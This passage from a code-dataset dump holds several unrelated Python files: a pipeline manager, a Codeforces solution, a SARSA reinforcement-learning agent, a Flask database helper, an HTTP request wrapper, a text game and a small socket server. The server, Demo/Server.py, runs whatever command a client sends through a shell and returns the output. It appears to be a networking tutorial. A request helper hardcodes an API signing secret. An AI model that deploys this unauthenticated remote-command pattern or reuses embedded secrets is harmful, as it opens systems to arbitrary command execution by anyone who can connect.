routine_type_name = routine_parameters.pop(\"routine_type_name\", \"\")\n routine_parameters[\"name\"] = routine_name\n responses.append(self.add_routine_to_component(\n component_name=component_name,\n routine_type_name=routine_type_name, **routine_parameters))\n except ValidationError as error:\n responses.append(self._create_response(\n False,\n error.message\n ))\n\n if all(response[\"Succeeded\"] for response in responses):\n return self._create_response(\n True,\n \"All of the components have been created\"\n )\n else:\n return list(filter(lambda response: not response[\"Succeeded\"], responses))\n\n def _get_routine_class_object_by_type_name(self, routine_name: str) -> Routine:\n path = self.ROUTINES_FOLDER_PATH + \"/\" + \\\n re.sub(r'[A-Z]',\n self._add_underscore_before_uppercase,\n routine_name)[1:] + \".py\"\n return self._get_class_object_by_path(path, routine_name)\n\n def _get_component_class_object_by_type_name(self, component_type_name):\n path = self.COMPONENTS_FOLDER_PATH + \"/\" + \\\n re.sub(r'[A-Z]',\n self._add_underscore_before_uppercase,\n component_type_name)[1:] + \".py\"\n return self._get_class_object_by_path(path, component_type_name)\n\n def _get_class_object_by_path(self, 
path, class_name):\n spec = importlib.util.spec_from_file_location(class_name, path)\n class_object = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(class_object)\n try:\n return getattr(class_object, class_name)\n except AttributeError:\n return None\n\n def _does_component_exist(self, component_name):\n return component_name in self.components\n\n @staticmethod\n def _does_component_running(component):\n return not component.stop_event.is_set()\n\n @staticmethod\n def _create_response(succeeded, message):\n return {\n \"Succeeded\": succeeded,\n \"Message\": message\n }\n\n def get_pipeline_creation(self):\n components = {}\n for component_name in self.components.keys():\n components[component_name] = self._get_component_creation(component_name)\n\n return {\"components\": components}\n\n def _get_component_creation(self, component_name):\n\n component_dict = {\n \"queues\":\n list(self.components[component_name].\n get_all_queue_names()),\n \"routines\": {}\n }\n\n if type(self.components[component_name]).__name__ != BaseComponent.__name__:\n component_dict[\"component_type_name\"] = type(self.components[component_name]).__name__\n for current_routine_object in self.components[component_name]._routines.values():\n routine_creation_object = self._get_routine_creation(\n component_name, current_routine_object)\n routine_name = routine_creation_object.pop(\"name\")\n component_dict[\"routines\"][routine_name] = \\\n routine_creation_object\n\n return component_dict\n\n def _get_routine_creation(self, component_name, routine):\n routine_dict = routine.get_creation_dictionary()\n routine_dict[\"routine_type_name\"] = routine.__class__.__name__\n for routine_param_name in routine_dict.keys():\n if \"queue\" in routine_param_name:\n for queue_name in self.components[component_name].queues.keys():\n if getattr(routine, routine_param_name) is \\\n self.components[component_name].queues[queue_name]:\n routine_dict[routine_param_name] = queue_name\n\n return routine_dict\n","sub_path":"pipert/core/pipeline_manager.py","file_name":"pipeline_manager.py","file_ext":"py","file_size_in_byte":18541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123841439","text":"import math\nfor _ in range(int(input())):\n l, r = map(int, input().split())\n if r%2 == 0:\n ans = r//2\n else:\n ans = -(r//2 + 1)\n if (l-1)%2 == 0:\n ans-=(l-1)//2\n else:\n ans+= (l-1)//2 +1\n print(ans) ","sub_path":"Codeforces/Codeforces Round #524 (Div. 
2) - 1080/1080B-Margarite and the best present.py","file_name":"1080B-Margarite and the best present.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"154522760","text":"from scipy.interpolate import UnivariateSpline\n\nbaseImp = [4410000, 4830000, 5250000, 5670000]\nquota = [1165978, 1329190, 1501474, 1682830]\ntipoMarginal = [0.3886, 0.3886, 0.4102, 0.4318]\n\ninterpolacionCuadratica = UnivariateSpline(baseImp, tipoMarginal, k = 2)\ninterpolacionCubica = UnivariateSpline(baseImp, tipoMarginal, k = 3)\n\nbaseEjemplo = 5000000\n\ntipoQuad = interpolacionCuadratica(baseEjemplo)\ntipoCubic = interpolacionCubica(baseEjemplo)\n\nprint(tipoQuad*100, '%')\nprint(tipoCubic*100, '%')\n\nprint(((baseEjemplo-baseImp[2])*tipoQuad)+quota[2])\nprint(((baseEjemplo-baseImp[2])*tipoCubic)+quota[2])","sub_path":"Ejercicio13-Impuesto a la renta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"399351988","text":"\"\"\"\nCreated on Dec 2, 2011\n\n@author: Administrator\n\"\"\"\n\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport flask.ext.sqlalchemy as flask_alchemy\nimport sqlalchemy as sa\nimport sqlalchemy.orm as orm\n\n\nclass Database(SQLAlchemy):\n # Until Armin merges the metadata passing feature, we need to subclass\n # this thing.\n def __init__(self, *args, **kwargs):\n self._metadata = kwargs.pop(\"metadata\", sa.MetaData())\n super(Database, self).__init__(*args, **kwargs)\n\n def make_declarative_base(self):\n \"\"\"Creates the declarative base.\"\"\"\n base = flask_alchemy.declarative_base(cls=flask_alchemy.Model, name='Model',\n mapper=flask_alchemy.signalling_mapper,\n metaclass=flask_alchemy._BoundDeclarativeMeta,\n metadata=self._metadata\n )\n base.query = flask_alchemy._QueryProperty(self)\n return base\n\n def create_scoped_session(self, options=None):\n \"\"\"Helper factory method that creates a scoped session.\"\"\"\n return orm.scoped_session(signalling_session_maker(self))\n\n\ndef get_state(app):\n \"\"\"Gets the state for the application\"\"\"\n assert 'sqlalchemy' in app.extensions, \\\n 'The sqlalchemy extension was not registered to the current ' \\\n 'application. 
Please make sure to call init_app() first.'\n return app.extensions['sqlalchemy']\n\ndef signalling_session_maker(db, autocommit=False, autoflush=False):\n class _SignallingSession(orm.Session):\n\n def __init__(self, **options):\n self.app = db.get_app()\n self._model_changes = {}\n orm.Session.__init__(self, autocommit=autocommit, autoflush=autoflush,\n extension=db.session_extensions,\n bind=db.engine,\n binds=db.get_binds(self.app), **options)\n\n def get_bind(self, mapper, clause=None):\n # mapper is None if someone tries to just get a connection\n if mapper is not None:\n info = getattr(mapper.mapped_table, 'info', {})\n bind_key = info.get('bind_key')\n if bind_key is not None:\n state = get_state(self.app)\n return state.db.get_engine(self.app, bind=bind_key)\n return orm.Session.get_bind(self, mapper, clause)\n return _SignallingSession\n","sub_path":"entityframework/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329926703","text":"from copy import deepcopy\nfrom slm_lab.agent import net\nfrom slm_lab.agent.algorithm.algorithm_util import act_fns, act_update_fns, decay_learning_rate\nfrom slm_lab.agent.algorithm.base import Algorithm\nfrom slm_lab.agent.net import net_util\nfrom slm_lab.lib import logger, util\nfrom slm_lab.lib.decorator import lab_api\nfrom torch.autograd import Variable\nimport numpy as np\nimport pydash as _\nimport sys\nimport torch\n\n\nclass SARSA(Algorithm):\n '''Implementation of SARSA.\n\n Algorithm:\n Repeat:\n 1. Collect some examples by acting in the environment and store them in an on policy replay memory (either batch or episodic)\n 2. For each example calculate the target (bootstrapped estimate of the discounted value of the state and action taken), y, using a neural network to approximate the Q function. s_t' is the next state following the action actually taken, a_t. a_t' is the action actually taken in the next state s_t'.\n y_t = r_t + gamma * Q(s_t', a_t')\n 4. For each example calculate the current estimate of the discounted value of the state and action taken\n x_t = Q(s_t, a_t)\n 5. Calculate L(x, y) where L is a regression loss (eg. mse)\n 6. Calculate the gradient of L with respect to all the parameters in the network and update the network parameters using the gradient\n '''\n\n def __init__(self, agent):\n '''\n After initialization SARSA has an attribute self.agent which contains a reference to the entire Agent acting in the environment.\n Agent components:\n - algorithm (with a net: neural network function approximator, and a policy: how to act in the environment). One algorithm per agent, shared across all bodies of the agent\n - memory (one per body)\n '''\n super(SARSA, self).__init__(agent)\n\n @lab_api\n def post_body_init(self):\n '''Initializes the part of algorithm needing a body to exist first. A body is a part of an Agent. Agents may have 1 to k bodies. 
Bodies do the acting in environments, and contain:\n - Memory (holding experiences obtained by acting in the environment)\n - State and action dimensions for an environment\n - Boolean var for if the action space is discrete\n '''\n self.init_nets()\n self.init_algo_params()\n logger.info(util.self_desc(self))\n\n def init_nets(self):\n '''Initialize the neural network used to learn the Q function from the spec'''\n body = self.agent.nanflat_body_a[0] # single-body algo\n self.state_dim = body.state_dim # dimension of the environment state, e.g. 4\n self.action_dim = body.action_dim # dimension of the environment actions, e.g. 2\n net_spec = self.agent.spec['net']\n mem_spec = self.agent.spec['memory']\n net_kwargs = util.compact_dict(dict(\n hid_layers_activation=_.get(net_spec, 'hid_layers_activation'),\n optim_param=_.get(net_spec, 'optim'),\n loss_param=_.get(net_spec, 'loss'),\n clamp_grad=_.get(net_spec, 'clamp_grad'),\n clamp_grad_val=_.get(net_spec, 'clamp_grad_val'),\n gpu=_.get(net_spec, 'gpu'),\n ))\n if net_spec['type'].find('Recurrent') != -1:\n self.net = getattr(net, net_spec['type'])(\n self.state_dim, net_spec['hid_layers'], self.action_dim, mem_spec['length_history'], **net_kwargs)\n else:\n self.net = getattr(net, net_spec['type'])(\n self.state_dim, net_spec['hid_layers'], self.action_dim, **net_kwargs)\n self.set_net_attributes()\n\n def set_net_attributes(self):\n '''Initializes additional parameters from the net spec. Called by init_nets'''\n net_spec = self.agent.spec['net']\n util.set_attr(self, _.pick(net_spec, [\n 'decay_lr', 'decay_lr_frequency', 'decay_lr_min_timestep', 'gpu'\n ]))\n if not hasattr(self, 'gpu'):\n self.gpu = False\n logger.info(f'Training on gpu: {self.gpu}')\n\n def init_algo_params(self):\n '''Initialize other algorithm parameters.'''\n algorithm_spec = self.agent.spec['algorithm']\n net_spec = self.agent.spec['net']\n self.action_policy = act_fns[algorithm_spec['action_policy']]\n self.action_policy_update = act_update_fns[algorithm_spec['action_policy_update']]\n self.set_other_algo_attributes()\n self.nanflat_explore_var_a = [\n self.explore_var_start] * self.agent.body_num\n\n def set_other_algo_attributes(self):\n '''Initializes additional parameters from the algorithm spec. Called by init_algo_params'''\n algorithm_spec = self.agent.spec['algorithm']\n util.set_attr(self, _.pick(algorithm_spec, [\n # explore_var is epsilon, tau or etc. depending on the action policy\n # these control the trade off between exploration and exploitaton\n 'explore_var_start', 'explore_var_end', 'explore_anneal_epi',\n 'gamma', # the discount factor\n 'training_frequency', # how often to train for batch training (once each training_frequency time steps)\n 'num_epis_to_collect', # how many episodes to collect before training for episodic training\n ]))\n self.to_train = 0\n self.set_memory_flag()\n\n def set_memory_flag(self):\n '''Flags if memory is episodic or discrete. 
This affects how self.sample() handles the batch it gets back from memory'''\n body = self.agent.nanflat_body_a[0]\n memory = body.memory.__class__.__name__\n if (memory.find('OnPolicyReplay') != -1) or (memory.find('OnPolicyNStepReplay') != -1):\n self.is_episodic = True\n elif (memory.find('OnPolicyBatchReplay') != -1) or (memory.find('OnPolicyNStepBatchReplay') != -1):\n self.is_episodic = False\n else:\n logger.warn(f'Error: Memory {memory} not recognized')\n raise NotImplementedError\n\n def compute_q_target_values(self, batch):\n '''Computes the target Q values for a batch of experiences'''\n # Calculate the Q values of the current and next states\n q_sts = self.net.wrap_eval(batch['states'])\n q_next_st = self.net.wrap_eval(batch['next_states'])\n q_next_actions = batch['next_actions']\n logger.debug2(f'Q next states: {q_next_st.size()}')\n # Get the q value for the next action that was actually taken\n idx = torch.from_numpy(np.array(list(range(q_next_st.size(0)))))\n if torch.cuda.is_available() and self.gpu:\n idx = idx.cuda()\n q_next_st_vals = q_next_st[idx, q_next_actions.squeeze_(1).data.long()]\n # Expand the dims so that q_next_st_vals can be broadcast\n q_next_st_vals.unsqueeze_(1)\n logger.debug2(f'Q next_states vals {q_next_st_vals.size()}')\n logger.debug3(f'Q next_states {q_next_st}')\n logger.debug3(f'Q next actions {q_next_actions}')\n logger.debug3(f'Q next_states vals {q_next_st_vals}')\n logger.debug3(f'Dones {batch[\"dones\"]}')\n # Compute q_targets using reward and Q value corresponding to the action taken in the next state if there is one. Make next state Q value 0 if the current state is done\n q_targets_actual = batch['rewards'].data + self.gamma * \\\n torch.mul((1 - batch['dones'].data), q_next_st_vals)\n logger.debug2(f'Q targets actual: {q_targets_actual.size()}')\n logger.debug3(f'Q states {q_sts}')\n logger.debug3(f'Q targets actual: {q_targets_actual}')\n # We only want to train the network for the action selected in the current state\n # For all other actions we set the q_target = q_sts so that the loss for these actions is 0\n q_targets = torch.mul(q_targets_actual, batch['actions_onehot'].data) + \\\n torch.mul(q_sts, (1 - batch['actions_onehot'].data))\n logger.debug2(f'Q targets: {q_targets.size()}')\n logger.debug3(f'Q targets: {q_targets}')\n return q_targets\n\n def sample(self):\n '''Samples a batch from memory'''\n batches = [body.memory.sample()\n for body in self.agent.nanflat_body_a]\n batch = util.concat_dict(batches)\n if self.is_episodic:\n util.to_torch_nested_batch(batch, self.gpu)\n # Add next action to batch\n batch['actions_onehot'] = []\n batch['next_actions'] = []\n for acts in batch['actions']:\n # The next actions are the actions shifted by one time step\n # For episodic training is does not matter that the action in the last state is set to zero since there is no corresponding next state. 
The Q target is just the reward received in the terminal state.\n next_acts = torch.zeros_like(acts)\n next_acts[:-1] = acts[1:]\n # Convert actions to one hot (both representations are needed for SARSA)\n acts_onehot = util.convert_to_one_hot(acts, self.action_dim, self.gpu)\n batch['actions_onehot'].append(acts_onehot)\n batch['next_actions'].append(next_acts)\n # Flatten the batch to train all at once\n batch = util.concat_episodes(batch)\n else:\n util.to_torch_batch(batch, self.gpu)\n # Batch only useful to train with if it has more than one element\n # Train function checks for this and skips training if batch is too small\n if batch['states'].size(0) > 1:\n batch['next_actions'] = torch.zeros_like(batch['actions'])\n batch['next_actions'][:-1] = batch['actions'][1:]\n batch['actions_onehot'] = util.convert_to_one_hot(batch['actions'], self.action_dim, self.gpu)\n batch_elems = ['states', 'actions', 'actions_onehot', 'rewards', 'dones', 'next_states', 'next_actions']\n for k in batch_elems:\n if batch[k].dim() == 1:\n batch[k].unsqueeze_(1)\n # If the last experience in the batch is not terminal the batch has to be shortened by one element since the algorithm does not yet have access to the next action taken for the final experience\n if batch['dones'].data[-1].int().eq_(0).cpu().numpy()[0]:\n logger.debug(f'Popping last element')\n for k in batch_elems:\n batch[k] = batch[k][:-1]\n return batch\n\n @lab_api\n def train(self):\n '''Completes one training step for the agent if it is time to train.\n Otherwise this function does nothing.\n '''\n t = util.s_get(self, 'aeb_space.clock').get('total_t')\n if self.to_train == 1:\n logger.debug3(f'Training at t: {t}')\n batch = self.sample()\n if batch['states'].size(0) < 2:\n logger.info(f'Batch too small to train with, skipping...')\n self.to_train = 0\n return np.nan\n q_targets = self.compute_q_target_values(batch)\n if torch.cuda.is_available() and self.gpu:\n q_targets = q_targets.cuda()\n y = Variable(q_targets)\n loss = self.net.training_step(batch['states'], y)\n logger.debug(f'loss {loss.data[0]}')\n self.to_train = 0\n return loss.data[0]\n else:\n logger.debug3('NOT training')\n return np.nan\n\n @lab_api\n def body_act_discrete(self, body, state):\n ''' Selects and returns a discrete action for body using the action policy'''\n return self.action_policy(body, state, self.net, self.nanflat_explore_var_a[body.nanflat_a_idx], self.gpu)\n\n def update_explore_var(self):\n '''Updates the explore variables'''\n space_clock = util.s_get(self, 'aeb_space.clock')\n nanflat_explore_var_a = self.action_policy_update(self, space_clock)\n explore_var_a = self.nanflat_to_data_a(\n 'explore_var', nanflat_explore_var_a)\n return explore_var_a\n\n def update_learning_rate(self):\n decay_learning_rate(self, [self.net])\n\n @lab_api\n def update(self):\n '''Update the agent after training'''\n self.update_learning_rate()\n return self.update_explore_var()\n","sub_path":"slm_lab/agent/algorithm/sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"28283625","text":"import mymodule\nclass Person:\n def __init__(self, n: str, a: int):\n self.name = n\n self.__age = a\n\n @property\n def age(self):\n return self.__age\n\n @age.setter\n def age(self, v):\n self.__age = v\n\n def __str__(self):\n return (f'{self.name},{self.__age}')\n\n def __repr__(self):\n return (f'group-{self.name},{self.__age}')\n\n\n\nvova1 = Person('Serko 
Vladimir', 30)\nvova2 = Person('Volk Vladimir', 25)\nmisha1 = Person('Strock Misha', 41)\nprint(vova1.age)\ngroup = [vova1, vova2, misha1]\nprint(group)\ngroup = sorted(group, key=lambda x: x.age)\nfor el in group:\n print(el)\nprint(mymodule.kor(group[0].age))\n\nclass Potok(Person):\n def sum_age(self, p):\n sum = 0\n for el in p:\n sum += el.age\n return sum\n\npotok1 = Potok('group', 4545)\npotok2 = Potok('group22', 66)\npotoki = [potok1, potok2]\nprint(potoki)\nprint(potok1.sum_age(potoki))","sub_path":"Domashka_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"368840469","text":"# _*_ coding: utf-8 _*_\nimport socket\nimport subprocess\nimport struct\nimport json\nphone = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #buy a phone\nphone.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\nphone.bind(('127.0.0.1',8080)) #bind the SIM card\nphone.listen(5) #maximum number of pending connections\nprint('start running.....')\nwhile True: #connection loop\n coon,addr = phone.accept()# wait to answer the call\n print(coon,addr)\n\n while True: #communication loop\n # send and receive messages\n cmd = coon.recv(1024) #maximum number of bytes to receive\n print('Received: %s'%cmd.decode('utf-8'))\n\n #processing\n res = subprocess.Popen(cmd.decode('utf-8'),\n shell = True,\n stdout=subprocess.PIPE, #standard output\n stderr=subprocess.PIPE #standard error\n )\n stdout = res.stdout.read()\n stderr = res.stderr.read()\n\n # build the header\n header_dic = {\n 'total_size': len(stdout)+len(stderr), # total size\n 'filename': None,\n 'md5': None\n }\n\n header_json = json.dumps(header_dic) #string type\n header_bytes = header_json.encode('utf-8') #convert to bytes (the length is variable)\n\n #first send the length of the header\n coon.send(struct.pack('i', len(header_bytes))) #send the fixed-length header\n\n #then send the header itself\n coon.send(header_bytes)\n\n #finally send the result of the command\n coon.send(stdout)\n coon.send(stderr)\n coon.close()\nphone.close()","sub_path":"Demo/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"648156448","text":"# coding = utf-8\nimport requests\nfrom natsort import natsorted\nimport hashlib\nimport os\nimport logging\nimport json\nimport configparser as cparser\n\nfrom log import logger\n\n\n# ======== Reading db_config.ini setting ===========\n\n\nclass DefTool:\n def url(self, patch):\n base_dir = str(os.path.dirname(os.path.dirname(__file__)))\n base_dir = base_dir.replace('\\\\', '/')\n file_path = base_dir + \"/url.ini\"\n cf = cparser.ConfigParser()\n cf.read(file_path)\n baseUrl = cf.get(\"urlTestconf\", \"url_test\")\n # baseUrl = cf.get(\"urlPreconf\", \"url_pre\")\n # baseUrl = cf.get(\"urlProconf\", \"url_pro\")\n url = baseUrl + patch\n return url\n\n def payload(self, **params):\n sortedList = []\n for key in params:\n try:\n sortedParms = str(key) + str(params[key])\n sortedList.append(sortedParms)\n except Exception as e:\n print(e)\n sort = natsorted(sortedList)\n argument = \"a8235488a6aae009ff7e32430fee2f44\"\n keysorted = argument + (\"\".join(sort))\n md = hashlib.md5()\n md.update(keysorted.encode(encoding='utf-8'))\n sign_old = md.hexdigest()\n sign = {\"sign\": sign_old}\n payload = dict(params, **sign)\n return payload\n\n def headers(self, token):\n header = {\"token\": token}\n return header\n\n\nclass RunMain:\n \"\"\"Wraps each request type: get, post, put, delete, options, head\"\"\"\n def __init__(self, method, url, params=None, header=None, params_json=None):\n self.re = self.http_request(method, url, params, header, params_json).json()\n def http_request(self, method, url, params=None, 
header=None, params_json=None):\n result = None\n if method == \"get\":\n try:\n result = requests.get(url=url, params=params, headers=header, json=params_json)\n logging.info(\"action get\")\n except Exception as e:\n logging.error(\"Request failed: url={}, params={}, header={}\".format(url, params, header))\n else:\n try:\n result = requests.post(url=url, data=params, headers=header, json=params_json)\n logging.info(\"action post\")\n except Exception as e:\n logging.error(\"Request failed: url={}, params={}, header={}\".format(url, params, header))\n # return json.dumps(result.json(), indent=2, sort_keys=False, ensure_ascii=False)\n return result\n\n\nif __name__ == \"__main__\":\n new_url = DefTool()\n url = new_url.url('/app/loan/getHomeProductListV3.do')\n print(url)\n test = RunMain(\"get\", url).re\n print(test)\n","sub_path":"Global_base/global_base.py","file_name":"global_base.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"160473133","text":"#HEADER\n#Created by: Scott Russell\n#Practicing my python (Small game example)\n\n#Time, os, and sys used for typewriter printing\nimport time,os,sys\n#random Seed imports\nfrom random import seed\nfrom random import randint\nimport random\n\n#Typewriter printing\ndef printo(text):\n\tfor character in text:\n\t\tsys.stdout.write(character)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.00)\n\tprint(\"\")\n\treturn\n\n#Typewriter printing for input line\ndef printi(text):\n\tfor character in text:\n\t\tsys.stdout.write(character)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.00) \n\tvalue = input() \n\treturn value \n\n#Clear screen \ndef clear_screen():\n os.system(\"cls\")\n\n#Initial screen display\ndef intro():\n\tprinto (\"---INTRO---\")\n\tprinto (\"Welcome to Scott's Game\\\n\")\n\treturn 0\n \n#Selecting a class name\ndef character_name():\n\twhile 1:\n\t\tprinto(\"---NAME SELECTION SCREEN---\")\n\t\t#pick a name\n\t\t\n\t\tname = str(printi(\"Please Enter a Character Name: \"))\n\t\tconfirm = printi(\"Are you sure you want to be named: [\"+name+\"] (y/n): \")\n\t\t\n\t\tif str(confirm) == \"y\" or str(confirm) == \"Y\":\n\t\t\tclear_screen()\n\t\t\treturn name\n\t\telif str(confirm) == \"n\" or str(confirm) == \"N\":\n\t\t\tprinto(\"You may choose another name!\")\n\t\telse:\n\t\t\tprinto(\"Invalid input. Let's try again.\")\n\t\t\t\n#Contains list of player classes, and provides input for selection\ndef class_selection(name):\n\t#IMPORTANT: To change the # of character classes simply change the class_count variable\n\t# You must also add/remove a line from the class Definitions array below. 
That's it!\n\tclass_count = 3\n\t\n\t#Define a 2D Array to contain all the information needed for classes\n\trows, cols = (class_count, 11)\n\tarray = [[0]*cols]*rows\t\n\t\n\t#Class Definitions\n\t#\t\t Name, Role,\t Base-HP,\tMax-HP, Weapon Name,\tWeapon-L, Weapon-H, Weapon Crit%,\tStrength, Dexterity, Constitution,\tLevel\tFirst Strike\tRestoration\tProtection\n\tarray[0] = [name,\"Soldier\", 20,\t\t 20,\t \"Broken Sword\", 1,\t\t \t4,\t\t \t10,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t0,\t\t\t\t2,\t\t\t\t\t0]\n\tarray[0].append(\"A strong and well balanced warrior, the soldier is able to restore health between fights.\")\n\t\n\tarray[1] = [name,\"Rogue\", 20,\t\t 20,\t \"Rusty Dagger\", 1,\t\t \t4,\t\t \t30,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t1,\t\t\t\t0,\t\t\t\t\t0]\n\tarray[1].append(\"The stealthy Rogue has an innate ability to always attack first.\")\n\t\n\tarray[2] = [name,\"Bulwark\", 20,\t\t 20,\t \"Dull Axe\",\t 1,\t\t \t4,\t\t \t0,\t\t\t \t5,\t\t \t5,\t\t \t5,\t\t\t\t1,\t\t0,\t\t\t\t0,\t\t\t\t\t1]\t\n\tarray[2].append(\"With heavy armor the bulwark is protected against a portion of all attacks.\")\n\n\t#For each Class assign statistics and display basic information\n\tfor i in range(class_count):\n\t\tarray[i] = set_stats(array[i])\n \n\t#Loop until a class is chosen\n\twhile 1: \n\t\tclear_screen()\n\t\tprinto(\"\\n---CLASS SELECTION SCREEN---\")\n\t\t#Display the names of each class for input\n\t\tfor i in range(class_count):\n\t\t\tprinto(\"[\"+str(i+1)+\"]=[\"+array[i].role +\"]\\n\"+array[i].description+\"\\n\")\n\t\t#Using a try except to catch invalid input from user\n\t\ttry:\n\t\t\tchoice =int(printi(\"Select a class for in depth statistics: \"))\n\t\t\tif choice <= class_count and choice >0:\n\t\t\t\tdisplay_stats(array[choice-1])\n\t\t\t\tchoice2 = printi(\"[1] - Confirm selection of class: [\"+str(array[choice-1].role)+\"]\\n[2] - Return to List of Classes\\n-->:\")\n\t\t\t\tif str(choice2) != \"1\":\n\t\t\t\t\tcontinue\n\t\t\t\tclear_screen()\n\t\t\t\treturn array[choice-1]\n\t\t\telse:\n\t\t\t\tprinto(\"Invalid Input!\\n\")\n\t\t\t\tos.system(\"pause\")\n\t\t\t\tcontinue\n\t\texcept ValueError as e:\n\t\t\tprinto( \"Invalid Input!\\n\")\n\t\t\tos.system(\"pause\")\n\t\t\tcontinue\n\t\n\t#This line should not be reachable\n\treturn 0\n\t\n#Displays in depth information for any character sent to this function.\ndef display_stats(character):\n\tclear_screen()\n\tprinto(\"---DETAILED-STATISTICS---\")\n\tprinto (\"\\nName: [\" + character.name+\"]\")\n\tprinto (\"Level: [\"+str(character.level)+\"] Experience: [\"+str(character.experience)+\"/\"+str(character.experience_to_level[character.level])+\"]\")\n\tprinto (\"Role: [\" + (character.role)+\"]\")\n\tprinto(\"Health: [\"+str(character.health[0]) +\"/\"+str(character.health[1])+\"]\")\n\tprinto(\"Weapon: [\"+str(character.weapon) +\"] ( Base Crit: [\"+str(character.weaponC)+\"%] )\")\n\tprinto(\"Base Damage: [\"+str(character.weaponD[0])+\"-\"+str(character.weaponD[1])+\"]\")\n\tprinto(\"Bonus Damage: [\"+str(character.strength_bonus)+\"]\")\n\tprinto(\"Critical Strike Chance: [\"+str(character.critical)+\"%]\")\n\tprinto(\"Strength: [\"+str(character.strength) +\"] provides a bonus of: [\"+str(character.strength_bonus)+\"] to damage.\")\n\tprinto(\"Dexterity: [\"+str(character.dexterity) + \"] provides a bonus of: [\"+str(character.dexterity_bonus)+ \"%] to Critical Strike Chance.\")\n\tprinto(\"Constitution: [\"+str(character.constitution) + \"] provides a bonus of: [\"+str(character.constitution_bonus) 
+\"] to health.\")\n\tif character.first_strike == 1:\n\t\tprinto(\"Special: [First Strike] in every combat\")\n\tif character.restoration > 0:\n\t\tprinto(\"Special: This character restores [\"+str(character.restoration)+\"] health after each battle\")\n\tif character.protection > 0:\n\t\tprinto(\"Special: Heavy Armor protects against [\"+str(character.protection)+\"] damage each combat\")\n\t\n\tif character.tower_level > 0:\n\t\tprinto(\"Tower Level: [\"+str(character.tower_level)+\"]\")\n\tprinto(\"\\n\")\n\treturn 0\n \n #Assigns Statistics to character or enemies based on 11 input fields data[0] - data[10]\ndef set_stats(data):\n\tclass Character:\n\t\t#Character Name\n\t\tname = data[0]\n\t\t#Character role\n\t\trole = data[1]\n\t\t#Current/Max\n\t\tbase_health = data[2],data[3]\n\t\t#Weapon Name\n\t\tweapon = data[4]\n\t\t#Damage has a low and high end\n\t\tweaponD = [data[5],data[6]]\n\t\t#Weapon Critical Strike Chance\n\t\tweaponC = data[7]\n\t\t\n\t\t#Strength of character --> Damage Bonus\n\t\tstrength = data[8]\n\t\tstrength_bonus = int(strength-5)\n\t\t\n\t\t#Dexterity of character --> Critical Strike Bonus\n\t\tdexterity = data[9]\n\t\tdexterity_bonus = int(dexterity-5)*10\n \n\t\t#Constitution of Character --> Increased Health\n\t\tconstitution = data[10]\n\t\tconstitution_bonus = int(constitution-5)\n\t\tlevel = data[11]\n\t\t\n\t\t#First strike players always attack first\n\t\tfirst_strike = data[12]\n\t\trestoration = data[13]\n\t\tprotection = data[14]\n\t\tdescription = data[15]\n\t\tis_player = True\n\t\ttower_level = 0\n\t\t\n\t\t#player starts with 0 experiencre\n\t\texperience = 0\n\t\t\n\t\t#break points for experience to level up\n\t\texperience_to_level = [0,5,10,15,20,25,30]\n\t\t#Apply Attributes bonuses to damage, health, and critical strike chance\n\t\tdamage = [weaponD[0]+strength_bonus,weaponD[1]+strength_bonus]\n\t\t#Prevents damage from being lower than 0\n\t\tif weaponD[0] < 0:\n\t\t\tweaponD[0] = 0\n\t\t\n\t\thealth = [base_health[0]+constitution_bonus,base_health[1]+constitution_bonus]\n\t\tcritical = weaponC + dexterity_bonus\n\t\t#Prevent critical strike chance from being lower than 0%\n\t\tif (critical < 0):\n\t\t\tcritical = 0\n\t#Assign a player object to the class, and return\n\tPlayer = Character() \n\treturn Player\n\n#select between Story Mode or Tower Mode\ndef gameplay_selection(): \n\twhile 1:\n\t\tprinto(\"---CHOOSE A GAMEPLAY MODE---\")\n\t\ttry:\n\t\t\tchoice = int(printi(\"[1] - Tower Mode \\n[2] - Story Mode\\n-->:\"))\n\t\t\tif choice == 1 or choice == 2:\n\t\t\t\treturn choice\n\t\t\telse:\n\t\t\t\tprinto(\"Invalid Input\\n\")\n\t\texcept ValueError as e:\n\t\t\tprinto( \"Invalid Input!\\n\")\n\t\t\tcontinue\n\treturn 0\n\n#Tower mode, fight waves of enemies until you die\ndef tower_mode(Player):\n\tclear_screen()\n\tprinto(\"---WELCOME TO TOWER MODE---\")\n\tprinto(\"In this mode, you will climb the tower.\")\n\tprinto(\"As you ascend, you will face stronger enemies\")\n\tprinto(\"How far can you go? 
